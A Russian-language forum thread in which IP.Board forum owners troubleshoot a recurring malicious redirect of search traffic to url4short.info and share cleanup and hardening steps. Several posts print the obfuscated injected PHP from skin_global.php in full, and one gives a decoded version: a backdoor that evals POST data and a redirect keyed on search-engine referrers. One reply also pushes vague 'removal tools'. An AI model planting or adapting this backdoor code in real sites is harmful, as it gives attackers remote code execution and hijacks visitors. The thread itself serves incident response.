Редирект, слив трафика

[Quasar]

Проблема такая:

При переходе на форум freedom-art с поисковиков(к примеру яндекс) перекидывает на _url4short.info/7de422bd (сайт на который льется наш трафик) Перекидывает всего один раз за сессию. Перелопатили все файлы, нечего подозрительного не нашли. Проверяли через хваленный AI-Bolit - тоже напрасно, он нечего не нашел. 

Для инфы, хостинг у нас не очень - ihc. Вроде бы убирали передаресация, а она все равно появилась, как - не знаем. Подозрение есть на хуки и модули, т.к. их многовато. Просьба помочь, т.к. трафик опять падет.

[lg29]

А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего.

[Quasar]

А платону написать в яндекс не судьба? что бы указали откуда слив идет. Была такая ситуация, отписал им туда, ответ пришел в течении нескольких часов с указанием файла и так же отписывал хостеру с такой проблемой тоже указал на файлы, так что можете попробывать хостеру своему отписать в ТП, но если он фуфлыжный как Вы сказали, следовательно от него можете не ждать чего то стоющего.

Хост сказал, что все хорошо, файлов вредоносных нет. 

[lg29]

Хост сказал, что все хорошо, файлов вредоносных нет. 

Напишите Платону посмотрим что ответит. А дальше видно будет что и как.

И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум.

[Quasar]

Напишите Платону посмотрим что ответит. А дальше видно будет что и как.

И по каким запросам слив трафика идет? потому что посмотрел сейчас, нормально все с яндекса идет на форум.

"фридом арт" по этому запросу, т.е. главной страницы, в .htaccess редиректа нет.

[Quasar]

<IfModule mod_rewrite.c>
Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule .(jpeg|jpg|gif|png|js)$ /public/404.php [NC,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

.htacces так выглядит, Платон меня направил туда же, так же попросил сделать, что уже делал)

[€ D-rA]

Этот эффект не был ваш сайт, но ваш компьютер - вирус.
Смотреть и скачать здесь removal tools

[WOLF]

что в index.php ?

[Quasar]

что в index.php ?

<?php
/**
 * <pre>
 * Invision Power Services
 * IP.Board v3.4.5
 * Main public executable wrapper.
 * Set-up and load module to run
 * Last Updated: $Date: 2013-02-26 08:08:06 -0500 (Tue, 26 Feb 2013) $
 * </pre>
 *
 * @author 		$Author: mark $
 * @copyright	(c) 2001 - 2009 Invision Power Services, Inc.
 * @license		__www.invisionpower.com/company/standards.php#license
 * @package		IP.Board
 * @link		__www.invisionpower.com
 * @version		$Rev: 12025 $
 *
 */	

define( 'IPB_THIS_SCRIPT', 'public' );
require_once( './initdata.php' );/*noLibHook*/

require_once( IPS_ROOT_PATH . 'sources/base/ipsRegistry.php' );/*noLibHook*/
require_once( IPS_ROOT_PATH . 'sources/base/ipsController.php' );/*noLibHook*/
ipsController::run();

exit();

[WOLF]

и либо в initdata.php

 

либо же на форуме шел, и вам его стоит лечить айболитом

__revisium.com/ai/

[Quasar]

 

и либо в initdata.php

 

либо же на форуме шел, и вам его стоит лечить айболитом

__revisium.com/ai/

форум лечили уже им

[pcmist]

Такая же беда с пациентом 3.4.7
Выпали все странички из яшки. Написал Платону, на что был дан коротенький ответ

В данный момент перенаправления происходят на ресурс url4short.info. Когда они будут устранены, страницы сайта вернутся в поиск автоматически.

 
Копнул поиском и нашел таких проблем много.
Добавлю сюда для инфы
В кэш файл скина skin_global.php, а также и в кэш, расположенный в БД дописывается вот такой код:

$k='b2488714339183624a45a9373ae8d945';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');

Если его декодировать
 

$i='ini_set';
if(function_exists($i)){
$i('display_errors',0);
$i('log_errors',0);
}
if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k])));
$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);
$f=@parse_url($_SERVER['HTTP_REFERER']);
$c=@$f['host'];
$r=@preg_match('#live.com|google.|yahoo.|bing.com|yandex.ru|rambler.ru|baidu.#i',$c);
$h=$_SERVER['HTTP_HOST'];
$b=$this->settings['cookie_id'];
$g=$b.'session_id';
$e=$b.'lang_id';
$d=empty($_SERVER['HTTP_X_MOZ']);
if(empty($_COOKIE[$e])){
if(isset($_GET['ipbv'])&&(!empty($_GET['g']))&&(!empty($_COOKIE[$g]))){
if($c==$h){
if($d)setcookie($e,'en',time()+36000);
$m=substr(md5($h),0,8);
print("document.location='__url4short.info/{$m}'");
}
exit;}
if((!$u)&&$r){$IPBHTML.="";}
}

Причем стоит обратить внимание, что куки записываются на 10 часов - 36000 секунд.  Переходя из поиска к вам на сайт, пациента перекидывает на урл4шот.инфо Через 10 часов куки отваливаются и пациент будет заходить нормально.
 
Решение: Очистить от ЛИШНЕГО кода указанного выше, в файле /cache/skin_cache/cacheid_1/skin_global.php

 

Перестроить все кэши Внешний вид --->Инструменты

 

Надеюсь решение кому то может.

Изменено 23 января, 2015 пользователем pcmist

[ferrete]

 

 

У меня такой вариант:

$pk='b16e523177731dcebff764b379878e77';
$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';
$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';
$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m';
$f='%t%'.substr($rsa,718,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

Найти бы корень зла...

[pcmist]

Пароли менять точно не стоит ни на админа, ни на базу.

Один форум ради эксперимента оставил " не защищенным" и смотрю по логам что делают. 

 

1. Они ищут название админки. Сменить название папки в  обязательном порядке на 2857258927598275 или подобное.

2. Поставить права 444 на все файлы /cache/skin_cache/cacheid_1/skin_global.php (Во всех папках cacheid_1, cacheid_2 и т.д.) 

3. Добавить в папку cache .htaccess со следующим содержанием.

#<ipb-protection>
<Files ~ "^.*.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)">
    Order allow,deny
    Deny from all
</Files>
<Files ~ "^.*.(ipb)$">
Header set Content-Disposition attachment
</Files>
#</ipb-protection> 

Других вариантов я пока не нашел. 

 

Важно, при каких то изменениях со стилями(инструменты очистки, css, перестроении кэша) не забыть вернуть файлуфайлам, права обратно.

[ttindex]

У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php

Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету.

Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам.

 

Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/

[Quasar]

У меня такого кода нету в /cache/skin_cache/cacheid_1/skin_global.php

Установил обновление ip.board security update - вроде всё как яндекс показал, что вирусов больше нету.

Потом яндекс выдал одну страницу где вирус снова появился. Перечитал кучу интернета и нашел один способ, который реально помогает, но я не пойму как это правильно осуществить в деле. Помогите разобрать по пунктам.

 

Админов и модером прошу не удалять ссылку, т.к. она является решением борьбы с вирусом на сайте:peter.upfold.org.uk/blog/2013/01/15/cleaning-up-the-ip-board-url4short-mess/

Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. 

[KitsuneSolar]

Опять что ли дыра? оО

Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила.

[muslimgauze]

Опять что ли дыра? оО

Я сам с таким сталкивался, но на форуме подруги. Думал, она домен не продлила.

 

скорее всего не "опять", а кто-то забыл старые дыры залатать или просто не успел

[ttindex]

Подниму, тех поддержка форума, проблема очень актуальна. Большинство форумов ипб в выдаче идет с переадрисацией. Тоже помощь по пунктам бы. 

поддержка, аууууууу, поможет кто чем сможет?

[ttindex]

в файле /cache/skin_cache/cacheid_1/skin_global.php

 

был найден и удален следующий код:

$pk='b5c742b518ce6244a2407ff3dd9c3fcc';
$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';
$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';
$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,[email protected][Mi-c^KFzg3|XL4Yu{>j*Tlf%m';
$f='%t%'.substr($rsa,718,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

После чего этот код удаляем и перестраиваем все стили Кеш.

Пишем в яндекс чтобы перепроверили сайт.

[ttindex]

Удалил данные строки из файла и все равно сегодня этот код появился в файле. 

Как быть?

[bluesmobil]

Добрый день.

Проблема актуально на 3.4.6

Убиваю код в файле skinglobal и кэше базы. перестраиваю кэши стиля. Сутки чисто. После, код появляется снова.

Как решить проблему, хелп.